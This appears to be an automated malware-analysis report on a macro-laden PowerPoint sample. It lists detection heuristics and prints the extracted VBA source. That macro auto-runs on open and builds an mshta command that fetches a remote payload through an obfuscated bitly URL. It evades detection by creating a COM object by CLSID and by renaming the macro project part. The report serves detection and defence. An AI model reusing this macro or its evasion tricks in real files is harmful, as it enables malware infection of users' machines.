MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.010 System Binary Proxy Execution: Regsvr32
The sample contains a VBA macro that is automatically executed upon opening. This macro leverages the WScript.Shell COM object to run a command. The command is constructed by concatenating strings to form 'mshta https://1230948%1230948@bitly.com/akdhikhasd', which indicates an attempt to download and execute a payload from the specified URL. The use of mshta suggests a potential for further execution, possibly involving PowerShell or other scripting interpreters.
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/eui.bin)
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Case 1 getEnumName = "mshta " Case 2 -
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Public Function myvalue() Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") End Function -
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Public Function myvalue() Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module11" Sub auto_open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://1230948%1230948@bitly.com/akdhikhasd In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 999 bytes |
SHA-256: 6c2ebfa6cf06461cf4fb041754e0067edd6e78df9e3db9e72470c15002960c2c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum
myname1 = 1
myname2 = 2
myname3 = 3
myname4 = 4
End Enum
Public Function getEnumName(eValue As myenum)
Select Case eValue
Case 1
getEnumName = "mshta "
Case 2
getEnumName = " https://1230948%1230948@bitly.com/akdhikhasd"
End Select
End Function
Public Function myvalue()
Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
End Function
Attribute VB_Name = "Module11"
Sub auto_open()
Dim bora As New Class1
Dim NamakBora, lora As String
NamakBora = bora.getEnumName(1)
lora = bora.getEnumName(2)
lora2 = NamakBora + lora
bora. _
myvalue. _
Run lora2
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/eui.bin | 17920 bytes |
SHA-256: d09a4bb36a0ee814e441ade59e15e35e459251638d72b51e8a4ff3080b47b47a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.